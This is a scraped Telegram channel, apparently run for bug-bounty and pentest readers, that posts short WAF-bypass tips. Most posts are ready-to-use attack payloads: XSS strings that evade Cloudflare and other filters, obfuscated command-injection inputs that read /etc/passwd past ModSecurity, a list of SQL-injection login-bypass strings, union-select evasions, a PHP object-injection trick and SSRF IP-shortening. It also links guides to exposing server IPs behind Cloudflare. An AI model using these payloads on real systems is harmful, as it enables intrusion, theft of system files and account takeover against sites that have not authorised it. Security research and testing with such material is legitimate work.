Information Security – Telegram

Information Security

408 subscribers

157 photos

5 videos

9 files

2.28K links

Information Security News

we are @sec_nerd twin brother

Download Telegram

About

Blog

Apps

Platform

Information Security

408 subscribers

Information Security

cloudflare bypass material

https://blog.christophetd.fr/bypassing-cloudflare-using-internet-wide-scan-data/

http://www.chokepoint.net/2017/10/exposing-server-ips-behind-cloudflare.html

http://www.securityidiots.com/Web-Pentest/Information-Gathering/Cloudflare-Bypass/Part-2-Cloudflare-Security-Bypass.html

https://medium.com/secure-hacker/bypass-cloudflare-protection-get-subdomains-ofa-website-2cb1d749c510

#web
#pentest
#bypass
#sqli
#xss

@sec_nerd_en

Christophe Tafani-Dereeper

CloudFlair: Bypassing Cloudflare using Internet-wide scan data - Christophe Tafani-Dereeper

Cloudflare is a service that acts as a middleman between a website and its end users, protecting it from various attacks. Unfortunately, those websites are often poorly configured, allowing an attacker to entirely bypass Cloudflare and run DDoS attacks or…

69 views19:18

Information Security

Cloudflare #XSS #Bypass

<img src onerror=%26emsp;prompt`${document.domain}`>

278 views17:00

Information Security

https://twitter.com/brutelogic/status/1189555088282587138

POI - #PHP Object Injection Leading zeroes & Arbitrary Chars Example: O:008:"stdClass":0001**s:006:"bypass";b:1;} (almost anything can be used in ** ) #bypass #bugbountytip

110 views17:43

Information Security

#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?

110 views18:13

Information Security

#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?

121 views18:29

Information Security

"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

#payloads #payload #bypass

126 views19:26

Information Security

sql injection login bypass

' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*

#payloads #payload #bypass

161 viewsedited 09:09

Information Security

Bugbounty tips#3

Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked

Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1

#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers

121 views18:49

Information Security

Xss payload waf bypass

Hh'><script>alert(1)</script> = waf
Cross mark

Hh'><marquee loop=1 width=0 onfinish=pr\u006fmpt`_Y000!_`>Y000</marquee> = waf bypassed
Ballot box with check

#payload #xss #waf #bypass

183 views03:56

Information Security

https://twitter.com/_Y000_/status/1303092547959615491?s=20

sql injection mod_security bypass usando distinct -1' union+select+1+--+✖️ -1' union+distinct+select+1+--+✖️ -1' and union+distinct+select+1+--+✖️ -1' and .0union+distinct+select+1+--+✅ un bypass no siempre es complicado #bypass #sql #CyberSecurity #payloads

259 views16:34